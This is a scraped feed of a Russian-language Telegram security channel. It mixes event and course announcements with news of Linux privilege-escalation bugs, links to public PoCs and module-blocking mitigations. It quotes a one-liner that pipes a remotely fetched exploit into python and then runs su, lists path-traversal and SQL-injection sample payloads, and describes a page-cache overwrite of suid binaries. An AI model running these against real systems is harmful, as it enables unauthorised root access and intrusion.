Кто-нибудь, скажите уже ребятам из Ozon, что при нажатии в письме отписаться от рассылки, нужно ансанскрайбить, а не вести в личный кабинет, которого у меня давно нет, но к нему привязана почта, а меня перекидывает в новый кабинет где почты никакой и нет. Номера старого у меня тоже нет.
Предыдущий пост тут
https://t.me/ever_secure/1071
Но там был Ozon Travel, теперь Ozon Fintech. я не понимаю как я подписался на все появляющиеся новые продукты, но очень хочу отписаться(
Кажется UX дизайнеру пока напокойотдых)
Предыдущий пост тут
https://t.me/ever_secure/1071
Но там был Ozon Travel, теперь Ozon Fintech. я не понимаю как я подписался на все появляющиеся новые продукты, но очень хочу отписаться(
Кажется UX дизайнеру пока на
👾9👍7👏3❤2
Forwarded from IT STAND
Live: Kubernetes v1.36: Haru
Рассмотрим нововведение:
- Функция NodeLogQuery контроля доступа включена по умолчанию
- Плагин gitRepovolumes удален навсегда
- Service.spec.externalIPs устарело. Это поле является известным вектором атаки типа MITM (Man-in-the-Middle) со времен CVE-2020-8554.
И многое другое
Обсудим примеры применения, что еще сырое, а что must have и срочно надо внедрять)
❤️ Главный по безопасным кубикам - Алексей Федулаев @int0x80h
❤️ Админ Девелоперович - Георг Гаал @gecube
Традиционно обозревают новую версию Kubernetes 1.36
🕖 уже в четверг в 20:00
Прямая трансляция: youtube.com/watch?v=l55Svj_WwH0
с ответами на вопросы из чата YouTube
При поддержке:
@kuber_community @ever_secure @devopsforlove @kubernetes_ru
🔥IT STAND |FIDELINA | YouTube
Рассмотрим нововведение:
- Функция NodeLogQuery контроля доступа включена по умолчанию
- Плагин gitRepovolumes удален навсегда
- Service.spec.externalIPs устарело. Это поле является известным вектором атаки типа MITM (Man-in-the-Middle) со времен CVE-2020-8554.
И многое другое
Обсудим примеры применения, что еще сырое, а что must have и срочно надо внедрять)
❤️ Главный по безопасным кубикам - Алексей Федулаев @int0x80h
❤️ Админ Девелоперович - Георг Гаал @gecube
Традиционно обозревают новую версию Kubernetes 1.36
🕖 уже в четверг в 20:00
Прямая трансляция: youtube.com/watch?v=l55Svj_WwH0
с ответами на вопросы из чата YouTube
При поддержке:
@kuber_community @ever_secure @devopsforlove @kubernetes_ru
🔥IT STAND |
Cloudflare пометила сайт <месенджера с парковки> вредоносным
https://radar.cloudflare.com/scan/3c745d75-2df5-4480-947f-278da1221657/summary
Видимо товарищ майор в список оплачиваемых уязвимостей не входил 🌚
https://radar.cloudflare.com/scan/3c745d75-2df5-4480-947f-278da1221657/summary
В пресс-службе Max заявили, что мессенджер "регулярно проходит аудиты безопасности, работает с исследователями через программу Bug Bounty и имеет собственный центр безопасности для защиты пользователей от реальных угроз".
Видимо товарищ майор в список оплачиваемых уязвимостей не входил 🌚
😁13❤4👏3🔥1
Ever Secure
Хочу немного рассказать о преподавательском составе курса! Для такого легендарного курса, я позвал не менее легендарных преподавателей. Вот первый из них: Александр Кондратьев (Автор канала Админим с Буквой @bykvaadm, Head of DevOps BI.ZONE). Саша DevOps…
Продолжая про наш будущий курс 👀
DevSecOps — это не «человек со сканером»
Когда я как руководитель собеседую DevSecOps, мне неинтересно, умеет ли человек воткнуть Trivy в пайплайн (у меня это спокойно делали стажеры). Мне важно: понимает ли он, что именно сканер ищет, сможет ли проэксплуатировать находку руками, объяснит ли разработчику, почему так сломалось и как правильно чинить.
Такому же подходу я придерживаюсь и в обучении!
Под это я и собрал лабы - 23 категории уязвимостей, 50+ флагов на эксплуатацию. И главное - не на уровне
хотя и их пройдем в самом начале 😉
Возьмём тот же Path Traversal. В лабе ты не просто читаешь ../../../etc/passwd. Ты учишься обходить фильтры:
• вырезания ../
• одинарное и двойное URL-кодирование
• кодирование только слеша / только точек
• absolute path bypass
• флаги раскиданы по разным файлам из реальных кейсов (будь то захардкоженные секреты в коде, креды в Dockerfile, интересных местах на системе и т.д). Таким образом, ты получаешь насмотренность
И так абсолютно по каждой теме: упор на вариативность векторов, обходы санитайзеров, реальные ошибки разработчиков, а не одна каноничная пейлоада из чек-листа. И это только 1 модуль из 11 💪
Моя цель: чтобы после курса человек смотрел на код и видел уязвимость до того, как сканер что-то скажет, прекрасно понимал, какие уязвимости он найдет с помощью SAST и DAST, а что не увидит и вовсе. Это и есть DevSecOps специалист, за которого я готов платить.
Старт: 06.06.26
Стоимость: 99к для первого потока
DevSecOps — это не «человек со сканером»
Когда я как руководитель собеседую DevSecOps, мне неинтересно, умеет ли человек воткнуть Trivy в пайплайн (у меня это спокойно делали стажеры). Мне важно: понимает ли он, что именно сканер ищет, сможет ли проэксплуатировать находку руками, объяснит ли разработчику, почему так сломалось и как правильно чинить.
Такому же подходу я придерживаюсь и в обучении!
Под это я и собрал лабы - 23 категории уязвимостей, 50+ флагов на эксплуатацию. И главное - не на уровне
../../../etc/passwd и 1' OR 1=1 --.
хотя и их пройдем в самом начале 😉
Возьмём тот же Path Traversal. В лабе ты не просто читаешь ../../../etc/passwd. Ты учишься обходить фильтры:
• вырезания ../
• одинарное и двойное URL-кодирование
• кодирование только слеша / только точек
• absolute path bypass
• флаги раскиданы по разным файлам из реальных кейсов (будь то захардкоженные секреты в коде, креды в Dockerfile, интересных местах на системе и т.д). Таким образом, ты получаешь насмотренность
И так абсолютно по каждой теме: упор на вариативность векторов, обходы санитайзеров, реальные ошибки разработчиков, а не одна каноничная пейлоада из чек-листа. И это только 1 модуль из 11 💪
Моя цель: чтобы после курса человек смотрел на код и видел уязвимость до того, как сканер что-то скажет, прекрасно понимал, какие уязвимости он найдет с помощью SAST и DAST, а что не увидит и вовсе. Это и есть DevSecOps специалист, за которого я готов платить.
Старт: 06.06.26
Стоимость: 99к для первого потока
1🔥23🥴7🥱5🙈5👍4
Ever Secure
астрологи объявили неделю обновлений CVE-2026-31431 curl https://copy.fail/exp | python3 && su 👀 @ever_secure | 💪 Мерч | 💳 Поддержать
Астрологи объявили продолжение недели обновлений, подъехал PoC побега из контейнера для Copy Fail (CVE-2026-31431)
https://www.stream.security/post/cve-2026-31431-how-copy-fail-behaves-in-kubernetes
👀 @ever_secure | 💪 Мерч | 💳 Поддержать
https://www.stream.security/post/cve-2026-31431-how-copy-fail-behaves-in-kubernetes
Please open Telegram to view this post
VIEW IN TELEGRAM
👍18
Ever Secure
Ждете новый выпуск CISO Podcast?💪
Media is too big
VIEW IN TELEGRAM
Новый выпуск CISO Podcast 🚀🚀🚀
Гость нашего выпуска: Валерий Сащенко (CISO ГНИВЦ, ex CISO Yota) с 20-летним опытом делится своим путём в ИБ: подводные камни, ошибки, препятствия. Обсудили на подкасте, как строить карьеру в информационной безопасности, с какими рисками вы столкнётесь и какие криминальные истории остаются за кадром индустрии.
Премьера 10 мая!
📹 Youtube
Предыдущий выпуск: https://t.me/ever_secure/1074
👀 @ever_secure | 💪 Мерч | 💳 Поддержать
Гость нашего выпуска: Валерий Сащенко (CISO ГНИВЦ, ex CISO Yota) с 20-летним опытом делится своим путём в ИБ: подводные камни, ошибки, препятствия. Обсудили на подкасте, как строить карьеру в информационной безопасности, с какими рисками вы столкнётесь и какие криминальные истории остаются за кадром индустрии.
Премьера 10 мая!
Предыдущий выпуск: https://t.me/ever_secure/1074
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15❤7🥰3🤣1
20 мая буду рассказывать, как мы строили процессы безопасности в нашем прекрасном облаке 🌨
Вы узнаете, как пройти весь путь от ручного сканирования кластеров до полной автоматизации. И не в теории🤓, а на практике🛠:
❔Какие есть подводные камни при переходе с ручных сканов на Admission
❔Как покрыть тепловыми картами кластеры и отслеживать нарушения
❔Как находить аномалии в поведении пользователей
❔И наконец, как это всё подружить с SOC
Вебинар будет полезен CISO, CTO, CIO, ИБ-специалистам и DevOps-инженерам, работающим в облачных средах. Регистрируйтесь, подключайтесь к прямому эфиру ирасскажите в чате как вы сделали лучше задавайте вопросы 😉
📆 20 мая в 12:00
Зарегистрироваться
Вы узнаете, как пройти весь путь от ручного сканирования кластеров до полной автоматизации. И не в теории🤓, а на практике🛠:
❔Какие есть подводные камни при переходе с ручных сканов на Admission
❔Как покрыть тепловыми картами кластеры и отслеживать нарушения
❔Как находить аномалии в поведении пользователей
❔И наконец, как это всё подружить с SOC
Вебинар будет полезен CISO, CTO, CIO, ИБ-специалистам и DevOps-инженерам, работающим в облачных средах. Регистрируйтесь, подключайтесь к прямому эфиру и
📆 20 мая в 12:00
Зарегистрироваться
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18👍7❤🔥3🤗1
Ever Secure
Астрологи объявили продолжение недели обновлений, подъехал PoC побега из контейнера для Copy Fail (CVE-2026-31431) https://www.stream.security/post/cve-2026-31431-how-copy-fail-behaves-in-kubernetes 👀 @ever_secure | 💪 Мерч | 💳 Поддержать
зря мы издевались над астрологами, старая неделя обновлений еще не успела закончится, как подъехала новая неделя обновлений)
Linux LPE
https://github.com/V4bel/dirtyfrag
👀 @ever_secure | 💪 Мерч | 💳 Поддержать
Linux LPE
https://github.com/V4bel/dirtyfrag
Please open Telegram to view this post
VIEW IN TELEGRAM
1❤9
Forwarded from Админим с Буквой (Aleksandr Kondratev)
Gist
CVE-2026-43284_CVE-2026-43500_mitigate
CVE-2026-43284_CVE-2026-43500_mitigate. GitHub Gist: instantly share code, notes, and snippets.
❤2🔥1
Мои друзья в этой году в четвертый раз проводят конференцию БеКон 2026: единственную в России конференцию по безопасности контейнеров и Kubernetes
Топовые специалисты рассказывают о безопасности Kubernetes без маркетинговой шелухи: только практики, кейсы и инструменты.
В этом году целых два трека:
🧪 «Ингредиенты» — технологии: hardening кластеров, runtime-защита, policy-as-code, сканирование образов
👥 «Рецепты» — люди и процессы: как выстроить культуру безопасности, коммуникацию Dev/Sec/Ops, внедрить Zero Trust в микросервисы
🗓 2 июня 2026 | 📍 Москва, Лофт ГОЭЛРО
👉 Регистрация и программа
Топовые специалисты рассказывают о безопасности Kubernetes без маркетинговой шелухи: только практики, кейсы и инструменты.
В этом году целых два трека:
🧪 «Ингредиенты» — технологии: hardening кластеров, runtime-защита, policy-as-code, сканирование образов
👥 «Рецепты» — люди и процессы: как выстроить культуру безопасности, коммуникацию Dev/Sec/Ops, внедрить Zero Trust в микросервисы
🗓 2 июня 2026 | 📍 Москва, Лофт ГОЭЛРО
👉 Регистрация и программа
1🔥5 3 2
Ever Secure
Новый выпуск CISO Podcast 🚀🚀🚀 Гость нашего выпуска: Валерий Сащенко (CISO ГНИВЦ, ex CISO Yota) с 20-летним опытом делится своим путём в ИБ: подводные камни, ошибки, препятствия. Обсудили на подкасте, как строить карьеру в информационной безопасности, с какими…
Media is too big
VIEW IN TELEGRAM
Друзья, состоялась премьера нового выпуска CISO Podcast!
Приятного просмотра:
📹 Youtube
👀 @ever_secure | 💪 Мерч | 💳 Поддержать
Приятного просмотра:
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥23 3 2
Ever Secure
зря мы издевались над астрологами, старая неделя обновлений еще не успела закончится, как подъехала новая неделя обновлений) Linux LPE https://github.com/V4bel/dirtyfrag 👀 @ever_secure | 💪 Мерч | 💳 Поддержать
Соскучились по обновлениям?
Встречайте Fragnesia Linux LPE 🎉
https://github.com/v12-security/pocs/tree/main/fragnesia
Новая уязвимость использует поверхность атаки, как и DirtyFrag (SP/XFRM), но является отдельной багой.
Митигация осталась прежней:
мы публиковали ансиболь плейбук туть: https://t.me/ever_secure/1197
Кто лечился обновлением ядра, оно не спасает от новой баги, бегите патчить 🥲
👀 @ever_secure | 💪 Мерч | 💳 Поддержать
Встречайте Fragnesia Linux LPE 🎉
https://github.com/v12-security/pocs/tree/main/fragnesia
Новая уязвимость использует поверхность атаки, как и DirtyFrag (SP/XFRM), но является отдельной багой.
Митигация осталась прежней:
rmmod esp4 esp6 rxrpc
printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf
мы публиковали ансиболь плейбук туть: https://t.me/ever_secure/1197
Кто лечился обновлением ядра, оно не спасает от новой баги, бегите патчить 🥲
Please open Telegram to view this post
VIEW IN TELEGRAM
😁3
Сюрприз для выезжающих за границу, если вы надеялись пожить в свободном мире, то вас ждёт сюрприз:
В роуминге трафик проксируется все равно через Россию, так что пожить без впна не получится 😂
Протестировано на МегаФоне и МТС
ЗЫ даже уехать из России уже не помогает 🤣🤣🤣
ЗЫЫ бонус удаленщикам на Бали
В роуминге трафик проксируется все равно через Россию, так что пожить без впна не получится 😂
Протестировано на МегаФоне и МТС
ЗЫ даже уехать из России уже не помогает 🤣🤣🤣
ЗЫЫ бонус удаленщикам на Бали
😁23
Ever Secure
Соскучились по обновлениям? Встречайте Fragnesia Linux LPE 🎉 https://github.com/v12-security/pocs/tree/main/fragnesia Новая уязвимость использует поверхность атаки, как и DirtyFrag (SP/XFRM), но является отдельной багой. Митигация осталась прежней: rmmod…
This media is not supported in your browser
VIEW IN TELEGRAM
Успели обновиться вчера? 🌚
Еще не успели выдохнуть, как подъехала 4 уязвимость
Arbitrary File Read Linux
https://github.com/0xdeadbeefnetwork/ssh-keysign-pwn/tree/main
Патча пока нет 🌚
👀 @ever_secure | 💪 Мерч | 💳 Поддержать
Еще не успели выдохнуть, как подъехала 4 уязвимость
Arbitrary File Read Linux
https://github.com/0xdeadbeefnetwork/ssh-keysign-pwn/tree/main
Патча пока нет 🌚
* Block pidfd_getfd. I don't think it's actually used that heavily and
there's often fallbacks for older kernels when it is.
* You could remove the world-executable bit from ssh-keysign
but this is *not* the only binary affected, and this is a very weak
mitigation indeed __only for the PoC__.
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚14 3
This media is not supported in your browser
VIEW IN TELEGRAM
New fragnesia Linux LPE
Сладких снов 😅
https://github.com/v12-security/pocs/tree/main/fragnesia-5db89c99566fc
Сладких снов 😅
https://github.com/v12-security/pocs/tree/main/fragnesia-5db89c99566fc
🔥13😁3 3
Forwarded from Технологический Болт Генона
Соскучились?
DirtyDecrypt - очередная уязвимость класса Copy Fail, предоставляющая права root в Linux
https://www.opennet.ru/opennews/art.shtml?num=65473
PoC
DirtyDecrypt / DirtyCBC
https://github.com/v12-security/pocs/tree/main/dirtydecrypt
DirtyDecrypt - очередная уязвимость класса Copy Fail, предоставляющая права root в Linux
https://www.opennet.ru/opennews/art.shtml?num=65473
CVE-идентификатор в примечании к эксплоиту не упоминается, указано лишь, что исследователи выявили проблему 9 мая, после чего сообщили об этом разработчикам ядра, которые ответили, что их находка дублирует другой отчёт об уже исправленной уязвимости. Так как патч с исправлением уже включён в ядро исследователи решили опубликовать разработанный ими эксплоит. Судя по описанию внутри эксплоита, в нём используется уязвимость CVE-2026-31635, исправление для которой было принято в ядро в апреле и вошло в состав ветки 7.0.0 и сформированного 18 апреля выпуска 6.18.23. Проблема проявляется начиная с ядра 6.16.
Как и в случае с серией уязвимостей Dirty Frag новая уязвимость присутствует в драйвере RxRPC, реализующем семейство сокетов AF_RXRPC и одноимённый RPC-протокол, работающий поверх UDP. Проблема вызвана ошибкой при проверке размера данных в функции rxgk_verify_response() - вместо проверки "if (auth_len > len)" в коде было указано "if (auth_len < len)", что приводило к передаче в функцию rxgk_decrypt_skb() данных с размером, больше допустимого. При выполнении функции rxgk_decrypt_skb() расшифровка данных осуществлялась с подстановкой изменений напрямую в страничный кэш для исключения лишней буферизации. Из-за неверной проверки размера возникала возможность перезаписи данных в страничном кэше по выбранному смещению.
Эксплуатация уязвимости сводится к чтению файла программы с флагом suid root (для его оседании в страничном кэше) и замене в страничном кэше части кода программы кодом для запуска /usr/bin/sh. Последующий запуск программы приведёт к тому, что в память будет загружен не оригинальный исполняемый файл с накопителя, а изменённая копия из страничного кэша. В качестве suid-программ в эксплоите предусмотрена возможность использования "/usr/bin/su", "/bin/su", "/usr/bin/mount", "/usr/bin/passwd" и "/usr/bin/chsh".
В качестве обходного пути защиты можно заблокировать загрузку модуля ядра rxrpc:
sh -c "printf 'install rxrpc /bin/false\n' > /etc/modprobe.d/dirtydecrypt.conf; rmmod rxrpc 2>/dev/null; true"PoC
DirtyDecrypt / DirtyCBC
https://github.com/v12-security/pocs/tree/main/dirtydecrypt
❤3🤨1 1
Ever Secure
20 мая буду рассказывать, как мы строили процессы безопасности в нашем прекрасном облаке 🌨 Вы узнаете, как пройти весь путь от ручного сканирования кластеров до полной автоматизации. И не в теории🤓, а на практике🛠: ❔Какие есть подводные камни при переходе…
уже завтра в 12:00 рассказываю, как мы строили процессы кубовой безопасности в ИБ
Не пропустите 😉
Зарегистрироваться
Не пропустите 😉
Зарегистрироваться
1👍12❤🔥5🔥4
Forwarded from МТС WEB SERVICES
This media is not supported in your browser
VIEW IN TELEGRAM